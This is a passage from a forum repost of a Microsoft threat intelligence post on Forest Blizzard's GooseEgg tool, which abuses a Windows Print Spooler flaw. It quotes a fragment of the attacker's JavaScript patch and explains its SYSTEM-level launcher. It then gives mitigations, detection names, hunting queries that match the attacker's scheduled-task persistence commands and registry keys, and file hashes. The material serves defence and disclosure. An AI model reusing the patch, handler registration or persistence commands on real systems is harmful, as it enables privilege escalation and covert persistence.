scriptContext, printTicket) {try{ printTicket.XmlNode.load('rogue9471://go'); } catch (e) {} The above patch to the [I]convertDevModeToPrintTicket[/I] function invokes the “rogue” search protocol handler’s CLSID during the call to [I]RpcEndDocPrinter[/I]. This results in the auxiliary DLL [I]wayzgoose.dll[/I] launching in the context of the PrintSpooler service with SYSTEM permissions. [I]wayzgoose.dll[/I] is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code. [HEADING=1]Recommendations[/HEADING] Microsoft recommends the following mitigations defend against attacks that use GooseEgg. [B]Reduce the Print Spooler vulnerability[/B] Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028']October 11, 2022[/URL] and updates for PrintNightmare vulnerabilities on [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675']June 8, 2021[/URL] and [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527']July 1, 2021[/URL]. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security. In addition, since the Print Spooler service isn’t required for domain controller operations, Microsoft recommends disabling the service on domain controllers. Otherwise, users can install available Windows security updates for Print Spooler vulnerabilities on Windows domain controllers before member servers and workstations. To help identify domain controllers that have the Print Spooler service enabled, Microsoft Defender for Identity has a [URL='https://learn.microsoft.com/defender-for-identity/security-assessment-print-spooler']built-in security assessment[/URL] that tracks the availability of Print Spooler services on domain controllers. [B]Be proactively defensive[/B] [LIST] [*]For customers, follow the credential hardening recommendations in our [URL='https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport?']on-premises credential theft overview[/URL] to defend against common credential theft techniques like LSASS access. [*]Run [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode']Endpoint Detection and Response (EDR) in block mode[/URL] so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. [*]Configure [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations']investigation and remediation[/URL] in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. [*]Turn on [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus']cloud-delivered protection[/URL] in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. [/LIST] Microsoft Defender XDR customers can turn on the following [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction']attack surface reduction rule[/URL] to prevent common attack techniques used for GooseEgg. Microsoft Defender XDR detects the GooseEgg tool and raises an alert upon detection of attempts to exploit Print Spooler vulnerabilities regardless of whether the device has been patched. [LIST] [*] [URL='https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem']Block credential stealing from the Windows local security authority subsystem (lsass.exe)[/URL] [/LIST] [HEADING=1]Detecting, hunting, and responding to GooseEgg[/HEADING] [HEADING=2]Microsoft Defender XDR detections[/HEADING] [B]Microsoft Defender Antivirus[/B] Microsoft Defender Antivirus detects threat components as the following malware: [LIST] [*]HackTool:Win64/GooseEgg [/LIST] [B]Microsoft Defender for Endpoint[/B] The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity. [LIST] [*]Possible exploitation of CVE-2021-34527 [*]Possible source of PrintNightmare exploitation [*]Possible target of PrintNightmare exploitation attempt [*]Potential elevation of privilege using print filter pipeline service [*]Suspicious behavior by [I]spoolsv.exe[/I] [*]Forest Blizzard Actor activity detected [/LIST] [B]Microsoft Defender for Identity[/B] The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity. [LIST] [*]Suspected Windows Print Spooler service exploitation attempt (CVE-2021-34527 exploitation) [/LIST] [HEADING=2]Threat intelligence reports[/HEADING] Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. [B]Microsoft Defender Threat Intelligence[/B] [LIST] [*][URL='https://security.microsoft.com/intel-profiles/dd75f93b2a771c9510dceec817b9d34d868c2d1353d08c8c1647de067270fdf8?tid=72f988bf-86f1-41af-91ab-2d7cd011db47']Actor Profile: Forest Blizzard[/URL] [*][URL='https://security.microsoft.com/intel-explorer/articles/2005aadf?tid=72f988bf-86f1-41af-91ab-2d7cd011db47']Abuse of Windows Print Spooler for privilege escalation and persistence[/URL] [/LIST] [HEADING=2]Hunting queries[/HEADING] [B]Microsoft Sentinel[/B] Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: [URL="https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy"]Discover and deploy Microsoft Sentinel out-of-the-box content from Content hub[/URL]. [B]Hunt for filenames, file extensions in ProgramData folder and file hash[/B] let filenames = dynamic(["execute.bat","doit.bat","servtask.bat"]); DeviceFileEvents | where TimeGenerated > ago(60d) // change the duration according to your requirement | where ActionType == "FileCreated" | where FolderPath == "C:\\ProgramData\\" | where FileName in~ (filenames) or FileName endswith ".save" or FileName endswith ".zip" or ( FileName startswith "wayzgoose" and FileName endswith ".dll") or SHA256 == "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9" // hash value of execute.bat/doit.bat/servtask.bat | project TimeGenerated, DeviceId, DeviceName, ActionType, FolderPath, FileName, InitiatingProcessAccountName,InitiatingProcessAccountUpn [B]Hunt for processes creating scheduled task creation[/B] DeviceProcessEvents | where TimeGenerated > ago(60d) // change the duration according to your requirement | where InitiatingProcessSHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" //hash value of justice.exe | where InitiatingProcessSHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" or SHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" //hash value of DefragmentSrv.exe or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or ProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv" or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or InitiatingProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv" | project TimeGenerated, AccountName,AccountUpn,ActionType, DeviceId, DeviceName,FolderPath, FileName [B]Hunt for JavaScript constrained file[/B] DeviceFileEvents | where TimeGenerated > ago(60d) // change the duration according to your requirement | where ActionType == "FileCreated" | where FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\" | where FileName endswith ".js" or FileName == "MPDW-constraints.js" [B]Hunt for creation of registry key / value events[/B] DeviceRegistryEvents | where TimeGenerated > ago(60d) // change the duration according to your requirement | where ActionType == "RegistryValueSet" | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server" | where RegistryValueName has "(Default)" | where RegistryValueData has "wayzgoose.dll" or RegistryValueData contains ".dll" [B]Hunt for custom protocol handler[/B] DeviceRegistryEvents | where TimeGenerated > ago(60d) // change the duration according to your requirement | where ActionType == "RegistryValueSet" | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue" | where RegistryValueName has "CLSID" | where RegistryValueData contains "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}" [HEADING=2]Indicators of compromise[/HEADING] [B]Batch script artifacts:[/B] [LIST] [*][I]execute.bat[/I] [*][I]doit.bat[/I] [*][I]servtask.bat[/I] [*]7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9 [/LIST] [B]GooseEgg artifacts:[/B] [LIST] [*][I]justice.pdb[/I] [*][I]wayzgoose.pdb[/I] [/LIST] [TABLE] [TR] [TD][B]Indicator[/B][/TD] [TD][B]Type[/B][/TD] [TD][B]Description[/B][/TD] [/TR] [TR] [TD]c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5[/TD] [TD]SHA-256[/TD] [TD]Hash of GooseEgg binary [I]DefragmentSrv.exe[/I][/TD] [/TR] [TR] [TD]6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f[/TD] [TD]SHA-256[/TD] [TD]Hash of GooseEgg binary [I]justice.exe[/I][/TD] [/TR] [TR] [TD]41a9784f8787ed86f1e5d20f9895059dac7a030d8d6e426b9ddcaf547c3393aa[/TD] [TD]SHA-256[/TD] [TD]Hash of [I]wayzgoose[%n].dll[/I] – where %n is a random number[/TD] [/TR] [/TABLE] [HEADING=2]References[/HEADING] [LIST] [*][URL]https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF[/URL] [*][URL="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527"]CVE - CVE-2021-34527[/URL] [*][URL="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675"]CVE - CVE-2021-1675[/URL] [*][URL="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-074a"]Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability | CISA[/URL] [/LIST] [HEADING=2]Learn more[/HEADING] For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: [URL="https://aka.ms/threatintelblog"]Threat intelligence | Microsoft Security Blog[/URL]. To get notified about new publications and to join discussions on social media, follow us on LinkedIn at [URL="https://www.linkedin.com/showcase/microsoft-threat-intelligence"]Microsoft Threat Intelligence | LinkedIn[/URL], and on X (formerly Twitter) at [URL]https://twitter.com/MsftSecIntel[/URL]. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: [URL]https://thecyberwire.com/podcasts/microsoft-threat-intelligence[/URL]. The post [URL='https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/']Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials[/URL] appeared first on [URL='https://www.microsoft.com/en-us/security/blog']Microsoft Security Blog[/URL]. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
